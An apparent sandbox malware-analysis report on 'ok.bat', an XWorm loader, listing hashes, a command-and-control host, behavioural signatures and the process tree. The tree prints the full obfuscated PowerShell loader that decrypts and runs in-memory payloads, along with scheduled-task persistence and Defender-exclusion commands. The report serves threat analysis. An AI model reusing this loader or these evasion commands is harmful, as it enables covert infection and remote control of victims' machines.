Analysis
-
max time kernel
15s -
max time network
16s -
platform
windows10-2004_x64 -
resource
win10v2004-20240802-en -
resource tags
arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system -
submitted
02-09-2024 09:24
Static task
static1
Behavioral task
behavioral1
Sample
ok.bat
Resource
win7-20240708-en
Behavioral task
behavioral2
Sample
ok.bat
Resource
win10v2004-20240802-en
General
-
Target
ok.bat
-
Size
408KB
-
MD5
b0f8f1efd13e7bd0cc66d64eb3d75a63
-
SHA1
1800d9fad1506bbaedf09da136b6334660fa31ab
-
SHA256
0aeb0fb66dd52c44d48137d6b5bbbef9bc57d01c3da4655665e541fdeda94158
-
SHA512
ef1ab4604783c6a58f7adfe0155226e69cb8970f8eaea211432f95c461bdf0aeccc2de677f687e943400dab05bc798b261d8ac5f58442bcac382096757e7d69f
-
SSDEEP
6144:bexdO5Cg9W3uNG0mS4jW5RBgYL9rJ4lwhCFPJt7Reg7lrjqV0KEmtlJ8xePlwGB2:iUCg9XNGxzy5RWnHv7N7B2EMbdwLjqeN
Malware Config
Extracted
xworm
final-consequently.gl.at.ply.gg:10334
-
Install_directory
%AppData%
-
install_file
COM Surrogate.exe
Signatures
-
Detect Xworm Payload 1 IoCs
resource yara_rule behavioral2/memory/4440-52-0x000002BA6B8F0000-0x000002BA6B90A000-memory.dmp family_xworm -
Blocklisted process makes network request 1 IoCs
flow pid Process 22 4440 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs
Run Powershell and hide display window.
pid Process 1668 powershell.exe 2468 powershell.exe 3728 powershell.exe 4952 powershell.exe 2060 powershell.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000\Control Panel\International\Geo\Nation WScript.exe -
Drops startup file 2 IoCs
description ioc Process File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\COM Surrogate.lnk powershell.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\COM Surrogate.lnk powershell.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\COM Surrogate = "C:\\Users\\Admin\\AppData\\Roaming\\COM Surrogate.exe" powershell.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 21 ip-api.com -
Drops file in System32 directory 6 IoCs
description ioc Process File opened for modification C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Maintenance Work svchost.exe File created C:\Windows\system32\SleepStudy\user-not-present-trace-2024-09-02-09-24-30.etl svchost.exe File opened for modification C:\Windows\system32\SleepStudy\user-not-present-trace-2024-09-02-09-24-30.etl svchost.exe File opened for modification C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Scan svchost.exe File opened for modification C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Work svchost.exe File opened for modification C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Wake To Work svchost.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Modifies data under HKEY_USERS 2 IoCs
description ioc Process Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\ExtendedProperties\LID = "0018800FEEAC3B05" svchost.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections svchost.exe -
Modifies registry class 7 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.Search_cw5n1h2txyewy\HAM\AUI\ShellFeedsUI\V1 svchost.exe Key created \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.Search_cw5n1h2txyewy\HAM\AUI\ShellFeedsUI\V1\LU svchost.exe Set value (int) \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.Search_cw5n1h2txyewy\HAM\AUI\ShellFeedsUI\V1\LU\PCT = "133697426707161705" svchost.exe Key created \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\Local Settings powershell.exe Key created \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.Search_cw5n1h2txyewy svchost.exe Key created \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.Search_cw5n1h2txyewy\HAM\AUI svchost.exe Key created \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.Search_cw5n1h2txyewy\HAM\AUI\ShellFeedsUI svchost.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 2128 powershell.exe 2128 powershell.exe 1668 powershell.exe 1668 powershell.exe 4440 powershell.exe 4440 powershell.exe 4440 powershell.exe 4440 powershell.exe 4440 powershell.exe 4440 powershell.exe 4440 powershell.exe 4440 powershell.exe 4440 powershell.exe 4440 powershell.exe 4440 powershell.exe 4440 powershell.exe 4440 powershell.exe 4440 powershell.exe 4440 powershell.exe 4440 powershell.exe 4440 powershell.exe 4440 powershell.exe 4440 powershell.exe 4440 powershell.exe 4440 powershell.exe 4440 powershell.exe 4440 powershell.exe 4440 powershell.exe 4440 powershell.exe 4440 powershell.exe 4440 powershell.exe 4440 powershell.exe 4440 powershell.exe 4440 powershell.exe 2468 powershell.exe 2468 powershell.exe 2468 powershell.exe 4440 powershell.exe 4440 powershell.exe 4440 powershell.exe 3728 powershell.exe 3728 powershell.exe 3728 powershell.exe 4440 powershell.exe 4440 powershell.exe 4440 powershell.exe 4952 powershell.exe 4952 powershell.exe 4952 powershell.exe 2060 powershell.exe 2060 powershell.exe 4440 powershell.exe 4440 powershell.exe 4440 powershell.exe 2060 powershell.exe 4440 powershell.exe 4440 powershell.exe 4440 powershell.exe 4440 powershell.exe 4440 powershell.exe 4440 powershell.exe 4440 powershell.exe 4440 powershell.exe 4440 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 2128 powershell.exe Token: SeDebugPrivilege 1668 powershell.exe Token: SeIncreaseQuotaPrivilege 1668 powershell.exe Token: SeSecurityPrivilege 1668 powershell.exe Token: SeTakeOwnershipPrivilege 1668 powershell.exe Token: SeLoadDriverPrivilege 1668 powershell.exe Token: SeSystemProfilePrivilege 1668 powershell.exe Token: SeSystemtimePrivilege 1668 powershell.exe Token: SeProfSingleProcessPrivilege 1668 powershell.exe Token: SeIncBasePriorityPrivilege 1668 powershell.exe Token: SeCreatePagefilePrivilege 1668 powershell.exe Token: SeBackupPrivilege 1668 powershell.exe Token: SeRestorePrivilege 1668 powershell.exe Token: SeShutdownPrivilege 1668 powershell.exe Token: SeDebugPrivilege 1668 powershell.exe Token: SeSystemEnvironmentPrivilege 1668 powershell.exe Token: SeRemoteShutdownPrivilege 1668 powershell.exe Token: SeUndockPrivilege 1668 powershell.exe Token: SeManageVolumePrivilege 1668 powershell.exe Token: 33 1668 powershell.exe Token: 34 1668 powershell.exe Token: 35 1668 powershell.exe Token: 36 1668 powershell.exe Token: SeIncreaseQuotaPrivilege 1668 powershell.exe Token: SeSecurityPrivilege 1668 powershell.exe Token: SeTakeOwnershipPrivilege 1668 powershell.exe Token: SeLoadDriverPrivilege 1668 powershell.exe Token: SeSystemProfilePrivilege 1668 powershell.exe Token: SeSystemtimePrivilege 1668 powershell.exe Token: SeProfSingleProcessPrivilege 1668 powershell.exe Token: SeIncBasePriorityPrivilege 1668 powershell.exe Token: SeCreatePagefilePrivilege 1668 powershell.exe Token: SeBackupPrivilege 1668 powershell.exe Token: SeRestorePrivilege 1668 powershell.exe Token: SeShutdownPrivilege 1668 powershell.exe Token: SeDebugPrivilege 1668 powershell.exe Token: SeSystemEnvironmentPrivilege 1668 powershell.exe Token: SeRemoteShutdownPrivilege 1668 powershell.exe Token: SeUndockPrivilege 1668 powershell.exe Token: SeManageVolumePrivilege 1668 powershell.exe Token: 33 1668 powershell.exe Token: 34 1668 powershell.exe Token: 35 1668 powershell.exe Token: 36 1668 powershell.exe Token: SeIncreaseQuotaPrivilege 1668 powershell.exe Token: SeSecurityPrivilege 1668 powershell.exe Token: SeTakeOwnershipPrivilege 1668 powershell.exe Token: SeLoadDriverPrivilege 1668 powershell.exe Token: SeSystemProfilePrivilege 1668 powershell.exe Token: SeSystemtimePrivilege 1668 powershell.exe Token: SeProfSingleProcessPrivilege 1668 powershell.exe Token: SeIncBasePriorityPrivilege 1668 powershell.exe Token: SeCreatePagefilePrivilege 1668 powershell.exe Token: SeBackupPrivilege 1668 powershell.exe Token: SeRestorePrivilege 1668 powershell.exe Token: SeShutdownPrivilege 1668 powershell.exe Token: SeDebugPrivilege 1668 powershell.exe Token: SeSystemEnvironmentPrivilege 1668 powershell.exe Token: SeRemoteShutdownPrivilege 1668 powershell.exe Token: SeUndockPrivilege 1668 powershell.exe Token: SeManageVolumePrivilege 1668 powershell.exe Token: 33 1668 powershell.exe Token: 34 1668 powershell.exe Token: 35 1668 powershell.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 4440 powershell.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 3008 wrote to memory of 1576 3008 cmd.exe 87 PID 3008 wrote to memory of 1576 3008 cmd.exe 87 PID 3008 wrote to memory of 2128 3008 cmd.exe 88 PID 3008 wrote to memory of 2128 3008 cmd.exe 88 PID 2128 wrote to memory of 1668 2128 powershell.exe 91 PID 2128 wrote to memory of 1668 2128 powershell.exe 91 PID 2128 wrote to memory of 4708 2128 powershell.exe 95 PID 2128 wrote to memory of 4708 2128 powershell.exe 95 PID 4708 wrote to memory of 4192 4708 WScript.exe 96 PID 4708 wrote to memory of 4192 4708 WScript.exe 96 PID 4192 wrote to memory of 1652 4192 cmd.exe 98 PID 4192 wrote to memory of 1652 4192 cmd.exe 98 PID 4192 wrote to memory of 4440 4192 cmd.exe 99 PID 4192 wrote to memory of 4440 4192 cmd.exe 99 PID 4440 wrote to memory of 3400 4440 powershell.exe 56 PID 4440 wrote to memory of 1376 4440 powershell.exe 23 PID 4440 wrote to memory of 4520 4440 powershell.exe 93 PID 4440 wrote to memory of 2148 4440 powershell.exe 39 PID 4440 wrote to memory of 3324 4440 powershell.exe 55 PID 4440 wrote to memory of 3520 4440 powershell.exe 57 PID 4440 wrote to memory of 3908 4440 powershell.exe 66 PID 4440 wrote to memory of 1344 4440 powershell.exe 22 PID 4440 wrote to memory of 2520 4440 powershell.exe 43 PID 4440 wrote to memory of 740 4440 powershell.exe 14 PID 4440 wrote to memory of 2512 4440 powershell.exe 42 PID 4440 wrote to memory of 2708 4440 powershell.exe 46 PID 4440 wrote to memory of 1524 4440 powershell.exe 27 PID 4440 wrote to memory of 1128 4440 powershell.exe 18 PID 4440 wrote to memory of 2700 4440 powershell.exe 45 PID 4440 wrote to memory of 1712 4440 powershell.exe 30 PID 4440 wrote to memory of 1504 4440 powershell.exe 26 PID 4440 wrote to memory of 912 4440 powershell.exe 11 PID 4440 wrote to memory of 2876 4440 powershell.exe 69 PID 4440 wrote to memory of 1992 4440 powershell.exe 33 PID 4440 wrote to memory of 1300 4440 powershell.exe 21 PID 4440 wrote to memory of 1492 4440 powershell.exe 25 PID 4440 wrote to memory of 960 4440 powershell.exe 12 PID 4440 wrote to memory of 1500 4440 powershell.exe 75 PID 4440 wrote to memory of 4980 4440 powershell.exe 68 PID 4440 wrote to memory of 1084 4440 powershell.exe 17 PID 4440 wrote to memory of 1472 4440 powershell.exe 24 PID 4440 wrote to memory of 672 4440 powershell.exe 53 PID 4440 wrote to memory of 1688 4440 powershell.exe 29 PID 4440 wrote to memory of 2836 4440 powershell.exe 50 PID 4440 wrote to memory of 2044 4440 powershell.exe 35 PID 4440 wrote to memory of 1452 4440 powershell.exe 36 PID 4440 wrote to memory of 2828 4440 powershell.exe 49 PID 4440 wrote to memory of 1840 4440 powershell.exe 37 PID 4440 wrote to memory of 2032 4440 powershell.exe 72 PID 4440 wrote to memory of 2424 4440 powershell.exe 41 PID 4440 wrote to memory of 1040 4440 powershell.exe 16 PID 4440 wrote to memory of 1028 4440 powershell.exe 15 PID 4440 wrote to memory of 1812 4440 powershell.exe 32 PID 4440 wrote to memory of 1612 4440 powershell.exe 28 PID 4440 wrote to memory of 1804 4440 powershell.exe 31 PID 4440 wrote to memory of 2000 4440 powershell.exe 34 PID 4440 wrote to memory of 4864 4440 powershell.exe 65 PID 4440 wrote to memory of 2192 4440 powershell.exe 40 PID 4440 wrote to memory of 2780 4440 powershell.exe 47 PID 4440 wrote to memory of 1200 4440 powershell.exe 20 PID 4440 wrote to memory of 800 4440 powershell.exe 10 PID 4440 wrote to memory of 1184 4440 powershell.exe 19 PID 800 wrote to memory of 1640 800 svchost.exe 101 PID 800 wrote to memory of 1640 800 svchost.exe 101
Processes
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -p1⤵
- Drops file in System32 directory
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:800 -
C:\Windows\system32\backgroundTaskHost.exe"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:ShellFeedsUI.AppXnj65k2d1a1rnztt2t2nng5ctmk3e76pn.mca2⤵PID:1640
-
-
C:\Windows\System32\mousocoreworker.exeC:\Windows\System32\mousocoreworker.exe -Embedding2⤵PID:2732
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k RPCSS -p1⤵PID:912
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM1⤵PID:960
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc1⤵PID:740
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService1⤵PID:1028
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts1⤵PID:1040
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNoNetwork -p1⤵PID:1084
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc1⤵PID:1128
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog1⤵PID:1184
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule1⤵
- Drops file in System32 directory
PID:1200
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc1⤵PID:1300
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s nsi1⤵PID:1344
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc1⤵PID:1376
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem1⤵PID:1472
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s Themes1⤵PID:1492
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp1⤵PID:1504
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager1⤵PID:1524
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s SENS1⤵PID:1612
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc1⤵PID:1688
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder1⤵PID:1712
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:1804
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s netprofm1⤵PID:1812
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache1⤵PID:1992
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:2000
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository1⤵PID:2044
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection1⤵PID:1452
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt1⤵PID:1840
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNoNetworkFirewall -p1⤵PID:2148
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation1⤵PID:2192
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc1⤵PID:2424
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT1⤵PID:2512
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent1⤵PID:2520
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc1⤵PID:2700
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc1⤵PID:2708
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer1⤵PID:2780
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks1⤵PID:2828
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService1⤵PID:2836
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker1⤵PID:672
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc1⤵PID:3324
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵PID:3400
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\ok.bat"2⤵
- Suspicious use of WriteProcessMemory
PID:3008 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('1HvwTOfe16KE/Oo1VmVeLyRX5eszT05lMFFAv86FK2M='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('iyFMMVCpvdKRQhPXVaNuEg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $DelDl=New-Object System.IO.MemoryStream(,$param_var); $iauBN=New-Object System.IO.MemoryStream; $WMepm=New-Object System.IO.Compression.GZipStream($DelDl, [IO.Compression.CompressionMode]::Decompress); $WMepm.CopyTo($iauBN); $WMepm.Dispose(); $DelDl.Dispose(); $iauBN.Dispose(); $iauBN.ToArray();}function execute_function($param_var,$param2_var){ $mjGIW=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $ujopB=$mjGIW.EntryPoint; $ujopB.Invoke($null, $param2_var);}$YUshL = 'C:\Users\Admin\AppData\Local\Temp\ok.bat';$host.UI.RawUI.WindowTitle = $YUshL;$RMXmR=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($YUshL).Split([Environment]::NewLine);foreach ($hdLAq in $RMXmR) { if ($hdLAq.StartsWith('npMFpQCGBAsoiliwarmL')) { $iDGWH=$hdLAq.Substring(20); break; }}$payloads_var=[string[]]$iDGWH.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "3⤵PID:1576
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"3⤵
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2128 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName '$phantom-RuntimeBroker_startup_299_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\$phantom-startup_str_299.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1668
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\$phantom-startup_str_299.vbs"4⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4708 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\$phantom-startup_str_299.bat" "5⤵
- Suspicious use of WriteProcessMemory
PID:4192 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('1HvwTOfe16KE/Oo1VmVeLyRX5eszT05lMFFAv86FK2M='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('iyFMMVCpvdKRQhPXVaNuEg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $DelDl=New-Object System.IO.MemoryStream(,$param_var); $iauBN=New-Object System.IO.MemoryStream; $WMepm=New-Object System.IO.Compression.GZipStream($DelDl, [IO.Compression.CompressionMode]::Decompress); $WMepm.CopyTo($iauBN); $WMepm.Dispose(); $DelDl.Dispose(); $iauBN.Dispose(); $iauBN.ToArray();}function execute_function($param_var,$param2_var){ $mjGIW=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $ujopB=$mjGIW.EntryPoint; $ujopB.Invoke($null, $param2_var);}$YUshL = 'C:\Users\Admin\AppData\Roaming\$phantom-startup_str_299.bat';$host.UI.RawUI.WindowTitle = $YUshL;$RMXmR=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($YUshL).Split([Environment]::NewLine);foreach ($hdLAq in $RMXmR) { if ($hdLAq.StartsWith('npMFpQCGBAsoiliwarmL')) { $iDGWH=$hdLAq.Substring(20); break; }}$payloads_var=[string[]]$iDGWH.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "6⤵PID:1652
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"6⤵
- Blocklisted process makes network request
- Drops startup file
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4440 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'7⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:2468
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'powershell.exe'7⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:3728
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\COM Surrogate.exe'7⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:4952
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'COM Surrogate.exe'7⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:2060
-
-
-
-
-
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc1⤵PID:3520
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc1⤵
- Modifies data under HKEY_USERS
PID:4864
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc1⤵PID:3908
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV1⤵PID:4980
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc1⤵
- Modifies data under HKEY_USERS
PID:2876
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager1⤵PID:2032
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc1⤵PID:1500
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv1⤵PID:4520
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc1⤵PID:212
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3KB
MD5661739d384d9dfd807a089721202900b
SHA15b2c5d6a7122b4ce849dc98e79a7713038feac55
SHA25670c3ecbaa6df88e88df4efc70968502955e890a2248269641c4e2d4668ef61bf
SHA51281b48ae5c4064c4d9597303d913e32d3954954ba1c8123731d503d1653a0d848856812d2ee6951efe06b1db2b91a50e5d54098f60c26f36bc8390203f4c8a2d8
-
Filesize
2KB
MD5005bc2ef5a9d890fb2297be6a36f01c2
SHA10c52adee1316c54b0bfdc510c0963196e7ebb430
SHA256342544f99b409fd415b305cb8c2212c3e1d95efc25e78f6bf8194e866ac45b5d
SHA512f8aadbd743495d24d9476a5bb12c8f93ffb7b3cc8a8c8ecb49fd50411330c676c007da6a3d62258d5f13dd5dacc91b28c5577f7fbf53c090b52e802f5cc4ea22
-
Filesize
1KB
MD5ade8b780188478d4bf68c97bc995b06f
SHA10b5124fca500da8f833a3be98bd5f732d3962343
SHA256318ce58720b7608811b1177c41ce0f7ec0437783db8ed188acbc523d08a3646b
SHA512c9d19f196b25e62bb6f717c46ec892b18d243646afdae4b848ce30802d1df4e5576bf6328ac88ce8bca01f17fed79da778ecfeb770fe0bcc14d167ad577fcc13
-
Filesize
944B
MD56d42b6da621e8df5674e26b799c8e2aa
SHA1ab3ce1327ea1eeedb987ec823d5e0cb146bafa48
SHA2565ab6a1726f425c6d0158f55eb8d81754ddedd51e651aa0a899a29b7a58619c4c
SHA51253faffbda8a835bc1143e894c118c15901a5fd09cfc2224dd2f754c06dc794897315049a579b9a8382d4564f071576045aaaf824019b7139d939152dca38ce29
-
Filesize
944B
MD5b4b6d4cc52b5a3a71149b1f33d94d5de
